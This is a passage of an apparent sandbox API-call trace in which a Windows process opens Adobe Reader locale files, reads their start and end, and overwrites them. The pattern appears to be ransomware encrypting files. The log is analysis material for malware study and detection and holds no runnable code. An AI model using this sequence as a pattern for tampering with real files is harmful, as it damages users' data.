nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.668] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0083.668] WriteFile (in: hFile=0x204, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.668] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0083.668] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.669] CloseHandle (hObject=0x204) returned 1 [0084.208] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\DigSig.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\digsig.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.209] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.209] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x20200 [0084.209] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.210] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.210] ReleaseMutex (hMutex=0x168) returned 1 [0084.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.RUM", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.RUM", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.RUM", lpUsedDefaultChar=0x0) returned 10 [0084.210] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0084.239] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1f200 [0084.240] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.295] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1f200 [0084.295] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.295] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0084.295] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.296] CloseHandle (hObject=0x1f0) returned 1 [0084.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\PPKLITE.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\ppklite.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.318] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.319] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x82600 [0084.319] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.319] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.319] ReleaseMutex (hMutex=0x168) returned 1 [0084.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.RUM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.RUM", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.RUM", lpUsedDefaultChar=0x0) returned 11 [0084.319] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0084.332] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.333] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x81600 [0084.334] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.336] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x81600 [0084.337] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.337] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0084.337] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0084.338] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.338] CloseHandle (hObject=0x1f0) returned 1 [0084.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe7 [0084.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.340] ReleaseMutex (hMutex=0x168) returned 1 [0084.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0084.340] ReadFile (in: hFile=0x1f0, lpBuffer=0x26bf6f8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf6f8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0084.341] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0084.342] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2e9f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0084.342] CloseHandle (hObject=0x1f0) returned 1 [0084.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\BRdlang32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\brdlang32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.343] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.343] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3400 [0084.343] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.343] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.343] ReleaseMutex (hMutex=0x168) returned 1 [0084.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.RUS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.RUS", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.RUS", lpUsedDefaultChar=0x0) returned 13 [0084.343] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.345] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0084.345] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.346] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0084.346] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.346] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0084.346] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.346] CloseHandle (hObject=0x1f0) returned 1 [0084.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Multimedia.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\multimedia.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.347] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.347] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x13c00 [0084.348] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.348] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.348] ReleaseMutex (hMutex=0x168) returned 1 [0084.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.RUS", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0084.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.RUS", cchWideChar=14, lpMultiByteStr=0x1f735ac, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.RUS", lpUsedDefaultChar=0x0) returned 14 [0084.348] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12c00 [0084.358] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12c00 [0084.359] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.359] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0084.360] WriteFile (in: hFile=0x1f0, lpBuffer=0x25aa0a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa0a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.360] CloseHandle (hObject=0x1f0) returned 1 [0084.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\SendMail.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\sendmail.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.361] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.361] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3e00 [0084.362] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.362] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.362] ReleaseMutex (hMutex=0x168) returned 1 [0084.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.RUS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.RUS", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.RUS", lpUsedDefaultChar=0x0) returned 12 [0084.362] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.364] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e00 [0084.364] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.365] Sleep (dwMilliseconds=0x0) [0084.993] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e00 [0084.994] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.995] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0084.995] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.995] CloseHandle (hObject=0x1f0) returned 1 [0084.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\AdobeCollabSync.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\adobecollabsync.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0084.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1c00 [0084.997] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0084.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.997] ReleaseMutex (hMutex=0x168) returned 1 [0084.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SKY", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0084.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SKY", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.SKY", lpUsedDefaultChar=0x0) returned 19 [0084.997] ReadFile (in: hFile=0x1f0, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x2e9f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0084.999] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0084.999] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0085.000] CloseHandle (hObject=0x1f0) returned 1 [0085.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\IA32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\ia32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe00 [0085.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.001] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.001] ReleaseMutex (hMutex=0x168) returned 1 [0085.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SKY", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0085.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SKY", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.SKY", lpUsedDefaultChar=0x0) returned 8 [0085.001] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0085.002] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.003] WriteFile 